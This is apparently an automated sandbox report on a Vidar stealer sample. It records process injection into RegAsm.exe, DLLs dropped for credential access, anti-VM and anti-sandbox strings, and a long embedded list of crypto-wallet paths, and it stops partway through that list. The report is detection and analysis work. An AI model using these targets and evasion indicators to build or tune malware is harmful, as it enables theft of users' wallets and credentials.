Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00418970 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_00418970

Source: softokn3.dll.2.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.2.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.2.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.2.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.2.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.2.dr	Static PE information: section name: .didat
Source: sqln[1].dll.2.dr	Static PE information: section name: .00cfg
Source: nss3.dll.2.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.2.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D62BA push ecx; ret	0_2_009D62CD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A19CCD push ecx; ret	0_2_00A19CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041A8B5 push ecx; ret	2_2_0041A8C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C21BF9 push ecx; ret	2_2_19DC4C03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C210C8 push ecx; ret	2_2_19E23552

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HDGCFHIDAKEC\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HDGCFHIDAKEC\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HDGCFHIDAKEC\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HDGCFHIDAKEC\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HDGCFHIDAKEC\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HDGCFHIDAKEC\mozglue.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HDGCFHIDAKEC\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HDGCFHIDAKEC\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HDGCFHIDAKEC\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HDGCFHIDAKEC\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HDGCFHIDAKEC\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HDGCFHIDAKEC\mozglue.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

2_2_00418970

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 7408, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: file.exe, RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: file.exe, RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: file.exe, RegAsm.exe	Binary or memory string: API_LOG.DLL
Source: RegAsm.exe, 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\HDGCFHIDAKEC\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\HDGCFHIDAKEC\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\HDGCFHIDAKEC\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\HDGCFHIDAKEC\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll	Jump to dropped file

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_004103D0 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410502h

2_2_004103D0

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009E960E FindFirstFileExW,	0_2_009E960E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040B1B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_0040B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00401200 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	2_2_00401200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040D4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040D4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00416740 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	2_2_00416740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00417800 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_00417800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00416F50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_00416F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004173C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	2_2_004173C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040A660 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040AAE0 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040AAE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00416BB0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,

2_2_00416BB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_004105A0 GetSystemInfo,wsprintfA,

2_2_004105A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: RegAsm.exe, 00000002.00000002.2055946086.0000000001601000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: RegAsm.exe, 00000002.00000002.2055946086.0000000001531000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.000000000157B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 00000002.00000002.2055946086.000000000151A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: RegAsm.exe, 00000002.00000002.2055946086.000000000151A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware-
Source: RegAsm.exe, 00000002.00000002.2055946086.000000000157B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnt

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node			graph_2-81842
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node			graph_2-80739

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009DAAD3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_009DAAD3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

2_2_00418970

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009EA789 mov eax, dword ptr fs:[00000030h]		0_2_009EA789
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009E0E87 mov ecx, dword ptr fs:[00000030h]		0_2_009E0E87

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009ECD88 GetProcessHeap,

0_2_009ECD88

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D6A95 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_009D6A95
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009DAAD3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_009DAAD3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D6D9F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_009D6D9F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D6EFB SetUnhandledExceptionFilter,	0_2_009D6EFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041AA5F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0041AA5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041FB38 SetUnhandledExceptionFilter,	2_2_0041FB38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041BF87 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0041BF87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C22C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_19C22C8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C242AF SetUnhandledExceptionFilter,	2_2_19C242AF

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00411C50 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

2_2_00411C50

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 424000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 643000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 644000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1183008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00A00418 cpuid

0_2_00A00418

Source: C:\Users\user\Desktop\file.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_009EC1C2
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_009EC4AF
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_009EC464
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_009EC5D5
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_009EC54A
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_009EC828
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_009EC951
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_009ECA57
Source: C:\Users\user\Desktop\file.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_009ECB26
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_009E57F3
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_009E5D19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	2_2_004103D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,LocalFree,	2_2_00410449
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	2_2_19C22112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	2_2_19C22112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	2_2_19DFFF17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_19E13300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_19C23AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	2_2_19E12DF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	2_2_19E12D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	2_2_19E12CB6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009D6C92 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_009D6C92

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00410280 GetProcessHeap,HeapAlloc,GetUserNameA,

2_2_00410280

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00410360 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

2_2_00410360

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.file.exe.a00018.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.a00018.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7408, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet 